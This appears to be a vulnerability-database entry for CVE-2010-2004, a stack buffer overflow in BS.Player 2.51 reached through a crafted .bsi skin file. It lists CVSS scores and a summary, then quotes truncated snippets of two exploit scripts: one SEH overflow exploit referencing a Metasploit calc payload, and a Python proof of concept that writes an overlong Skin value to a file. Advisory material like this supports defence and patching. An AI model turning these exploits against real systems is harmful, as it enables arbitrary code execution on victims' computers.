9.3
CVSSv2

CVE-2010-2004

Published: 20/05/2010 Updated: 17/08/2017
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
VMScore: 940
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

Stack-based buffer overflow in BS.Global BS.Player 2.51 Build 1022 Free, and possibly other versions, allows user-assisted remote malicious users to execute arbitrary code via the Skin parameter in the Options section of a skins file (.bsi), a different vulnerability than CVE-2009-1068.

Vulnerable Product Search on Vulmon Subscribe to Product

bsplayer bs.player 2.51

Exploits

# Exploit Title: BSPlayer v251 Universal SEH Overflow Exploit # Date: 15/01/2010 # Author: Dz_attacker # Version: 251 # Tested on: Windows xp sp3 # Code : # Discover : mertsarica # Exploit : Dz_Attacker (dz_attacker@hotmailfr) junk = "[Options]\nSkin=" # win32_exec - EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum metasploit ...
# BSPlayer v251 # Software Link: wwwbsplayercom/bsplayer-english/download-freehtml # SEH Overwrite Vulnerability # wwwmertsaricacom junk = "[Options]\nSkin=" vulnerability = junk + "\x41"*496 + "\x42"*4 + "\x43"*4 try: vulnerable = open("vulnerablebsi",'w') vulnerablewrite(vulnerability) vulnerableclose() ...